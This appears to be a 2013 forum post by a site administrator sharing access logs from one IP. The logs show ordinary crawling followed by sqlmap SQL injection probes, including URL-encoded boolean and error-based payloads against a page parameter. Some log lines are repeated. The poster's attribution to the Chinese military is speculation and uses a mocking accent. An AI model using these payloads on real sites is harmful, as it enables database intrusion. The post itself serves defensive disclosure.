sqlmap and friends from 222.65.235.110 (iphone_new [email protected])
1 July, 2013 - 14:51
Must be the new PLA herro. Some of this looks more like DoS than scanning, but they were probably just mapping the site. They were using the username iphone_new on the site.
This looks fairly innocent:
222.65.235.110 - - [25/Jun/2013:06:47:14 -0400] "GET /images/1337-Forum-Topics HTTP/1.1" 200 13755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:14 -0400] "GET /blogs/CyberWolfRemus/12-programming-issues-avoid HTTP/1.1" 200 15359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:21 -0400] "GET /news/2009-Tutorial-Contest-and-Holiday-Releases-Over HTTP/1.1" 200 14689 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:20 -0400] "GET /bbs/15-easy-fixes-Mac-security-risks-macworldcom HTTP/1.1" 200 49758 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:26 -0400] "GET /news/2009-Tutorial-Contest-Votes-Tallied-Kayin-Takes-First-Place-Again HTTP/1.1" 200 14686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:27 -0400] "GET /news/2009-Wallpaper-Contest-Ending-Soon HTTP/1.1" 200 14187 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:31 -0400] "GET /tracker?order=title&page=1&sort=asc HTTP/1.1" 200 45041 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:32 -0400] "GET /tracker?order=title&page=2&sort=asc HTTP/1.1" 200 44591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:45 -0400] "GET /tracker?order=title&page=3&sort=asc HTTP/1.1" 200 44059 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:47 -0400] "GET /tracker?order=title&page=4&sort=asc HTTP/1.1" 200 44718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:01 -0400] "GET /tracker?order=title&page=6&sort=asc HTTP/1.1" 200 44942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:01 -0400] "GET /tracker?order=title&page=5&sort=asc HTTP/1.1" 200 44510 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:16 -0400] "GET /tracker?order=title&page=7&sort=asc HTTP/1.1" 200 44107 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:16 -0400] "GET /tracker?order=title&page=8&sort=asc HTTP/1.1" 200 44505 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:14 -0400] "GET /blogs/CyberWolfRemus/12-programming-issues-avoid HTTP/1.1" 200 15359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:21 -0400] "GET /news/2009-Tutorial-Contest-and-Holiday-Releases-Over HTTP/1.1" 200 14689 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:20 -0400] "GET /bbs/15-easy-fixes-Mac-security-risks-macworldcom HTTP/1.1" 200 49758 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:26 -0400] "GET /news/2009-Tutorial-Contest-Votes-Tallied-Kayin-Takes-First-Place-Again HTTP/1.1" 200 14686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:27 -0400] "GET /news/2009-Wallpaper-Contest-Ending-Soon HTTP/1.1" 200 14187 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:31 -0400] "GET /tracker?order=title&page=1&sort=asc HTTP/1.1" 200 45041 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:32 -0400] "GET /tracker?order=title&page=2&sort=asc HTTP/1.1" 200 44591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:45 -0400] "GET /tracker?order=title&page=3&sort=asc HTTP/1.1" 200 44059 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:47:47 -0400] "GET /tracker?order=title&page=4&sort=asc HTTP/1.1" 200 44718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:01 -0400] "GET /tracker?order=title&page=6&sort=asc HTTP/1.1" 200 44942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:01 -0400] "GET /tracker?order=title&page=5&sort=asc HTTP/1.1" 200 44510 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:16 -0400] "GET /tracker?order=title&page=7&sort=asc HTTP/1.1" 200 44107 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
222.65.235.110 - - [25/Jun/2013:06:48:16 -0400] "GET /tracker?order=title&page=8&sort=asc HTTP/1.1" 200 44505 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)"
While this clearly is not:
222.65.235.110 - - [25/Jun/2013:08:27:32 -0400] "GET /bbs/New-Members?page=6 HTTP/1.1" 200 3634 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:27:36 -0400] "GET /bbs/New-Members?page=6 HTTP/1.1" 200 3488 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:27:59 -0400] "GET /bbs/New-Members?page=7853 HTTP/1.1" 200 3491 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:02 -0400] "GET /bbs/New-Members?page=6%2C%27.%22%28%5B%5D%5B%22%22 HTTP/1.1" 200 3511 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:05 -0400] "GET /bbs/New-Members?page=6%29%20AND%201299%3D8387%20AND%20%283301%3D3301 HTTP/1.1" 200 3668 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:08 -0400] "GET /bbs/New-Members?page=6%29%20AND%205572%3D5572%20AND%20%289600%3D9600 HTTP/1.1" 200 3665 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:10 -0400] "GET /bbs/New-Members?page=6%29%20AND%203263%3D7353%20AND%20%289782%3D9782 HTTP/1.1" 200 3666 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:13 -0400] "GET /bbs/New-Members?page=6%20AND%201746%3D7279 HTTP/1.1" 200 3651 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:16 -0400] "GET /bbs/New-Members?page=6%20AND%205572%3D5572 HTTP/1.1" 200 3652 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:19 -0400] "GET /bbs/New-Members?page=6%20AND%207422%3D6698 HTTP/1.1" 200 3653 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:22 -0400] "GET /bbs/New-Members?page=6%27%29%20AND%202947%3D1151%20AND%20%28%27nyKn%27%3D%27nyKn HTTP/1.1" 200 3673 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:27 -0400] "GET /bbs/New-Members?page=6%29%20AND%20%28SELECT%206982%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a787a763a%2C%28SELECT%20%28CASE%20WHEN%20%286982%3D6982%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7371693a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%283118%3D3118 HTTP/1.1" 200 3832 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:09:11:43 -0400] "GET /scripts/test.script HTTP/1.1" 404 22996 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1541.0 Safari/537.36"
222.65.235.110 - - [25/Jun/2013:08:27:36 -0400] "GET /bbs/New-Members?page=6 HTTP/1.1" 200 3488 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:27:59 -0400] "GET /bbs/New-Members?page=7853 HTTP/1.1" 200 3491 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:02 -0400] "GET /bbs/New-Members?page=6%2C%27.%22%28%5B%5D%5B%22%22 HTTP/1.1" 200 3511 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:05 -0400] "GET /bbs/New-Members?page=6%29%20AND%201299%3D8387%20AND%20%283301%3D3301 HTTP/1.1" 200 3668 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:08 -0400] "GET /bbs/New-Members?page=6%29%20AND%205572%3D5572%20AND%20%289600%3D9600 HTTP/1.1" 200 3665 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:10 -0400] "GET /bbs/New-Members?page=6%29%20AND%203263%3D7353%20AND%20%289782%3D9782 HTTP/1.1" 200 3666 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:13 -0400] "GET /bbs/New-Members?page=6%20AND%201746%3D7279 HTTP/1.1" 200 3651 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:16 -0400] "GET /bbs/New-Members?page=6%20AND%205572%3D5572 HTTP/1.1" 200 3652 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:19 -0400] "GET /bbs/New-Members?page=6%20AND%207422%3D6698 HTTP/1.1" 200 3653 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:22 -0400] "GET /bbs/New-Members?page=6%27%29%20AND%202947%3D1151%20AND%20%28%27nyKn%27%3D%27nyKn HTTP/1.1" 200 3673 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:08:28:27 -0400] "GET /bbs/New-Members?page=6%29%20AND%20%28SELECT%206982%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a787a763a%2C%28SELECT%20%28CASE%20WHEN%20%286982%3D6982%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7371693a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%283118%3D3118 HTTP/1.1" 200 3832 "-" "sqlmap/1.0-dev (<a href="http://sqlmap.org" title="http://sqlmap.org">http://sqlmap.org</a>)"
222.65.235.110 - - [25/Jun/2013:09:11:43 -0400] "GET /scripts/test.script HTTP/1.1" 404 22996 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1541.0 Safari/537.36"